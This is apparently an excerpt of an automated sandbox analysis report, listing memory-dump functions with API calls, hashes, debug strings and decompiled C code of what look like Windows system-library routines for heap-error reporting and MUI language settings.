                                                    Uniqueness Score: -1.00%

                                                    Function 0096D417, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00967C73,?), ref: 0096D44B
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 1a95b08ccd8315acf8369c4f34c3a1c299924e38e560ba749ac97031beb77c2a
                                                    • Instruction ID: 2791ddb67e035261a34525354e16b3c46093433b4e09671a94a0fbb4190967f1
                                                    • Opcode Fuzzy Hash: 1a95b08ccd8315acf8369c4f34c3a1c299924e38e560ba749ac97031beb77c2a
                                                    • Instruction Fuzzy Hash: 4FD0A9A2BA83042AE620EBB05C02F2626885B81B00F068994B04CEB0E3DDA8E4202036
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0096D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00967C73,?), ref: 0096D44B
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                    • Instruction ID: a2bebc3024603e67c5eb94393096900a77f7e1ec029e1dc956d533af1c61fdc7
                                                    • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                    • Instruction Fuzzy Hash: 36D05E627503042BE610BAA49C03F26728C9B84B00F498064F94C962C3D964E9004162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B8967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e06ce4a274ce1ae9640384984e9f8e2f0a4a98e92206d0348fe62a7d397513d5
                                                    • Instruction ID: b0ad15e8e3281b069868bb00c21c3c2d90fe9f6adfc5a7bf187f0094a81afcf4
                                                    • Opcode Fuzzy Hash: e06ce4a274ce1ae9640384984e9f8e2f0a4a98e92206d0348fe62a7d397513d5
                                                    • Instruction Fuzzy Hash: 70B09BB29014C5C5FF11E76147087377D54F7D0745F16C0A5D1021641A4778D491F5B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 04BFB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • The resource is owned shared by %d threads, xrefs: 04BFB37E
                                                    • an invalid address, %p, xrefs: 04BFB4CF
                                                    • a NULL pointer, xrefs: 04BFB4E0
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04BFB3D6
                                                    • Go determine why that thread has not released the critical section., xrefs: 04BFB3C5
                                                    • *** then kb to get the faulting stack, xrefs: 04BFB51C
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04BFB39B
                                                    • *** enter .cxr %p for the context, xrefs: 04BFB50D
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04BFB38F
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04BFB484
                                                    • The resource is owned exclusively by thread %p, xrefs: 04BFB374
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04BFB53F
                                                    • *** enter .exr %p for the exception record, xrefs: 04BFB4F1
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 04BFB48F
                                                    • *** Inpage error in %ws:%s, xrefs: 04BFB418
                                                    • read from, xrefs: 04BFB4AD, 04BFB4B2
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04BFB323
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04BFB2F3
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04BFB476
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04BFB2DC
                                                    • This failed because of error %Ix., xrefs: 04BFB446
                                                    • The critical section is owned by thread %p., xrefs: 04BFB3B9
                                                    • The instruction at %p tried to %s , xrefs: 04BFB4B6
                                                    • The instruction at %p referenced memory at %p., xrefs: 04BFB432
                                                    • write to, xrefs: 04BFB4A6
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04BFB305
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04BFB314
                                                    • <unknown>, xrefs: 04BFB27E, 04BFB2D1, 04BFB350, 04BFB399, 04BFB417, 04BFB48E
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 04BFB352
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04BFB47D
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: 32afd1975841490f705f35e7d83c3b2a1fe5837adcdba895f2ad608d5815ea0e
                                                    • Instruction ID: 2d0eb33045e46fe28bf0fece6336c4748075120780a039af6d0f1464797377dc
                                                    • Opcode Fuzzy Hash: 32afd1975841490f705f35e7d83c3b2a1fe5837adcdba895f2ad608d5815ea0e
                                                    • Instruction Fuzzy Hash: 6B81F475A44210FFEB216B1ACC85E6B3B2AEF46B57F4040C4F6082B122E375B515DAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C01C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E04C01C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4b248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B4B150();
				} else {
					E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4c3589c);
				E04B4B150("Heap error detected at %p (heap handle %p)\n",  *0x4c358a0);
				_t27 =  *0x4c35898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04C01E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B4B150();
				} else {
					E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04B4B150("Error code: %d - %s\n",  *0x4c35898);
				_t113 =  *0x4c358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B4B150();
					} else {
						E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B4B150("Parameter1: %p\n",  *0x4c358a4);
				}
				_t115 =  *0x4c358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B4B150();
					} else {
						E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B4B150("Parameter2: %p\n",  *0x4c358a8);
				}
				_t117 =  *0x4c358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B4B150();
					} else {
						E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B4B150("Parameter3: %p\n",  *0x4c358ac);
				}
				_t119 =  *0x4c358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B4B150();
					} else {
						E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4c358b4);
					E04B4B150("Last known valid blocks: before - %p, after - %p\n",  *0x4c358b0);
				} else {
					_t120 =  *0x4c358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B4B150();
				} else {
					E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04B4B150("Stack trace available at %p\n", 0x4c358c0);
			}











                                                    0x04c01c10
                                                    0x04c01c16
                                                    0x04c01c1e
                                                    0x04c01c3d
                                                    0x04c01c3e
                                                    0x04c01c20
                                                    0x04c01c35
                                                    0x04c01c3a
                                                    0x04c01c44
                                                    0x04c01c55
                                                    0x04c01c5a
                                                    0x04c01c65
                                                    0x04c01c67
                                                    0x00000000
                                                    0x04c01c6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04c01c67
                                                    0x04c01cdc
                                                    0x04c01ce5
                                                    0x04c01d04
                                                    0x04c01d05
                                                    0x04c01ce7
                                                    0x04c01cfc
                                                    0x04c01d01
                                                    0x04c01d0b
                                                    0x04c01d17
                                                    0x04c01d1f
                                                    0x04c01d25
                                                    0x04c01d30
                                                    0x04c01d4f
                                                    0x04c01d50
                                                    0x04c01d32
                                                    0x04c01d47
                                                    0x04c01d4c
                                                    0x04c01d61
                                                    0x04c01d67
                                                    0x04c01d68
                                                    0x04c01d6e
                                                    0x04c01d79
                                                    0x04c01d98
                                                    0x04c01d99
                                                    0x04c01d7b
                                                    0x04c01d90
                                                    0x04c01d95
                                                    0x04c01daa
                                                    0x04c01db0
                                                    0x04c01db1
                                                    0x04c01db7
                                                    0x04c01dc2
                                                    0x04c01de1
                                                    0x04c01de2
                                                    0x04c01dc4
                                                    0x04c01dd9
                                                    0x04c01dde
                                                    0x04c01df3
                                                    0x04c01df9
                                                    0x04c01dfa
                                                    0x04c01e00
                                                    0x04c01e0a
                                                    0x04c01e13
                                                    0x04c01e32
                                                    0x04c01e33
                                                    0x04c01e15
                                                    0x04c01e2a
                                                    0x04c01e2f
                                                    0x04c01e39
                                                    0x04c01e4a
                                                    0x04c01e02
                                                    0x04c01e02
                                                    0x04c01e08
                                                    0x00000000
                                                    0x00000000
                                                    0x04c01e08
                                                    0x04c01e5b
                                                    0x04c01e7a
                                                    0x04c01e7b
                                                    0x04c01e5d
                                                    0x04c01e72
                                                    0x04c01e77
                                                    0x04c01e95

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 47e7f3fabdd352f049be2ba7a34102dadabfa1e34feade141c6730438725e510
                                                    • Instruction ID: 176a7889e6554ce5a9a817a1d3d693b6e694aa7c0300dd95a441c5d249206c57
                                                    • Opcode Fuzzy Hash: 47e7f3fabdd352f049be2ba7a34102dadabfa1e34feade141c6730438725e510
                                                    • Instruction Fuzzy Hash: E961F537664251EFE7019B96D485E24B3A6EB04B32B0DC0EAF50D5B390DA36FC50DE0A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B53D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E04B53D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04B51B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04B51B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04B51B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04B51B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04B51B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04B64620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04B8F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04B91370(_t276, 0x4b24e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04B8BB40(0,  &_v68, _t170);
									if(L04B543C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04B8BB40(_t257,  &_v68, _t243);
								if(L04B543C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04B91370(_t278, 0x4b24e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04B64620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04B8F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04B91370(_v16, 0x4b24e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04B8BB40(_t262,  &_v68, _t244);
								if(L04B543C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04B91370(_t282, 0x4b24e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04B8BB40(_t262,  &_v68, _t201);
							if(L04B543C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04B64620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04B8F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04B91370(_t280, 0x4b24e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04B8BB40(_t267,  &_v68, _t245);
							if(L04B543C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04B91370(_t284, 0x4b24e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04B8BB40(_t267,  &_v68, _t224);
						if(L04B543C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                    0x04b53d3c
                                                    0x04b53d42
                                                    0x04b53d44
                                                    0x04b53d46
                                                    0x04b53d49
                                                    0x04b53d4c
                                                    0x04b53d4f
                                                    0x04b53d52
                                                    0x04b53d55
                                                    0x04b53d58
                                                    0x04b53d5b
                                                    0x04b53d5f
                                                    0x04b53d61
                                                    0x04b53d66
                                                    0x04ba8213
                                                    0x04ba8218
                                                    0x04b54085
                                                    0x04b54088
                                                    0x04b5408e
                                                    0x04b54094
                                                    0x04b5409a
                                                    0x04b540a0
                                                    0x04b540a6
                                                    0x04b540a9
                                                    0x04b540af
                                                    0x04b540b6
                                                    0x04b540bd
                                                    0x04b540bd
                                                    0x04b53d83
                                                    0x04ba821f
                                                    0x04ba8229
                                                    0x04ba8238
                                                    0x04ba8238
                                                    0x04ba823d
                                                    0x04ba823d
                                                    0x04b53da0
                                                    0x04b53daf
                                                    0x04b53db5
                                                    0x04b53dba
                                                    0x04b53dba
                                                    0x04b53dd4
                                                    0x04b53e94
                                                    0x04b53eab
                                                    0x04b53f6d
                                                    0x04b53f84
                                                    0x04b5406b
                                                    0x04b5406b
                                                    0x04b5406e
                                                    0x04b5406e
                                                    0x04b54070
                                                    0x04b54074
                                                    0x04ba8351
                                                    0x04ba8351
                                                    0x04b5407a
                                                    0x04b5407f
                                                    0x04ba835d
                                                    0x04ba8370
                                                    0x04ba8377
                                                    0x04ba8379
                                                    0x04ba837c
                                                    0x04ba837c
                                                    0x04ba835d
                                                    0x00000000
                                                    0x04b5407f
                                                    0x04b53f8a
                                                    0x04b53f8d
                                                    0x04b53f90
                                                    0x04b53f95
                                                    0x04ba830d
                                                    0x04ba830f
                                                    0x04b53f9b
                                                    0x04b53fac
                                                    0x04b53fae
                                                    0x04b53fb1
                                                    0x04b53fb1
                                                    0x04b53fb6
                                                    0x04ba8317
                                                    0x04ba831a
                                                    0x00000000
                                                    0x04b53fbc
                                                    0x04b53fc1
                                                    0x04b53fc9
                                                    0x04b53fd7
                                                    0x04b53fda
                                                    0x04b53fdd
                                                    0x04b54021
                                                    0x04b54021
                                                    0x04b54029
                                                    0x04b54030
                                                    0x04b54044
                                                    0x04b54046
                                                    0x04b54046
                                                    0x04b54044
                                                    0x04b54049
                                                    0x04ba8327
                                                    0x04ba8334
                                                    0x04ba8339
                                                    0x04ba833c
                                                    0x04b5404f
                                                    0x04b5404f
                                                    0x04b5404f
                                                    0x04b54051
                                                    0x04b54056
                                                    0x04b54063
                                                    0x04b54063
                                                    0x04b54068
                                                    0x00000000
                                                    0x04b54068
                                                    0x04b53fdf
                                                    0x04b53fe2
                                                    0x04b53fe4
                                                    0x04b53fe7
                                                    0x04b53fef
                                                    0x04b54003
                                                    0x04b54005
                                                    0x04b54005
                                                    0x04b5400c
                                                    0x04b54013
                                                    0x04b54016
                                                    0x04b54017
                                                    0x04b5401b
                                                    0x04b5401e
                                                    0x00000000
                                                    0x04b5401e
                                                    0x04b53fb6
                                                    0x04b53eb1
                                                    0x04b53eb4
                                                    0x04b53eb7
                                                    0x04b53ebc
                                                    0x04ba82a9
                                                    0x04ba82ab
                                                    0x04b53ec2
                                                    0x04b53ed3
                                                    0x04b53ed5
                                                    0x04b53ed8
                                                    0x04b53ed8
                                                    0x04b53edd
                                                    0x04ba82b3
                                                    0x04ba82b6
                                                    0x00000000
                                                    0x04b53ee3
                                                    0x04b53ee8
                                                    0x04b53eed
                                                    0x04b53ef0
                                                    0x04b53ef3
                                                    0x04b53f02
                                                    0x04b53f05
                                                    0x04b53f08
                                                    0x04ba82c0
                                                    0x04ba82c3
                                                    0x04ba82c5
                                                    0x04ba82c8
                                                    0x04ba82d0
                                                    0x04ba82e4
                                                    0x04ba82e6
                                                    0x04ba82e6
                                                    0x04ba82ed
                                                    0x04ba82f4
                                                    0x04ba82f7
                                                    0x04ba82f8
                                                    0x04ba82fc
                                                    0x04ba82ff
                                                    0x04ba82ff
                                                    0x04b53f0e
                                                    0x04b53f11
                                                    0x04b53f16
                                                    0x04b53f1d
                                                    0x04b53f31
                                                    0x04ba8307
                                                    0x04ba8307
                                                    0x04b53f31
                                                    0x04b53f39
                                                    0x04b53f48
                                                    0x04b53f4d
                                                    0x04b53f50
                                                    0x04b53f50
                                                    0x04b53f53
                                                    0x04b53f58
                                                    0x04b53f65
                                                    0x04b53f65
                                                    0x04b53f6a
                                                    0x00000000
                                                    0x04b53f6a
                                                    0x04b53edd
                                                    0x04b53dda
                                                    0x04b53ddd
                                                    0x04b53de0
                                                    0x04b53de5
                                                    0x04ba8245
                                                    0x04b53deb
                                                    0x04b53df7
                                                    0x04b53dfc
                                                    0x04b53dfe
                                                    0x04b53e01
                                                    0x04b53e01
                                                    0x04b53e06
                                                    0x04ba824d
                                                    0x04ba824f
                                                    0x04ba8254
                                                    0x00000000
                                                    0x04b53e0c
                                                    0x04b53e11
                                                    0x04b53e16
                                                    0x04b53e19
                                                    0x04b53e29
                                                    0x04b53e2c
                                                    0x04b53e2f
                                                    0x04ba825c
                                                    0x04ba825f
                                                    0x04ba8261
                                                    0x04ba8264
                                                    0x04ba826c
                                                    0x04ba8280
                                                    0x04ba8282
                                                    0x04ba8282
                                                    0x04ba8289
                                                    0x04ba8290
                                                    0x04ba8293
                                                    0x04ba8294
                                                    0x04ba8298
                                                    0x04ba829b
                                                    0x04ba829b
                                                    0x04b53e35
                                                    0x04b53e38
                                                    0x04b53e3d
                                                    0x04b53e44
                                                    0x04b53e58
                                                    0x04ba82a3
                                                    0x04ba82a3
                                                    0x04b53e58
                                                    0x04b53e60
                                                    0x04b53e6f
                                                    0x04b53e74
                                                    0x04b53e77
                                                    0x04b53e77
                                                    0x04b53e7a
                                                    0x04b53e7f
                                                    0x04b53e8c
                                                    0x04b53e8c
                                                    0x04b53e91
                                                    0x00000000
                                                    0x04b53e91

                                                    Strings
                                                    • Kernel-MUI-Number-Allowed, xrefs: 04B53D8C
                                                    • WindowsExcludedProcs, xrefs: 04B53D6F
                                                    • Kernel-MUI-Language-SKU, xrefs: 04B53F70
                                                    • Kernel-MUI-Language-Allowed, xrefs: 04B53DC0
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 04B53E97
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
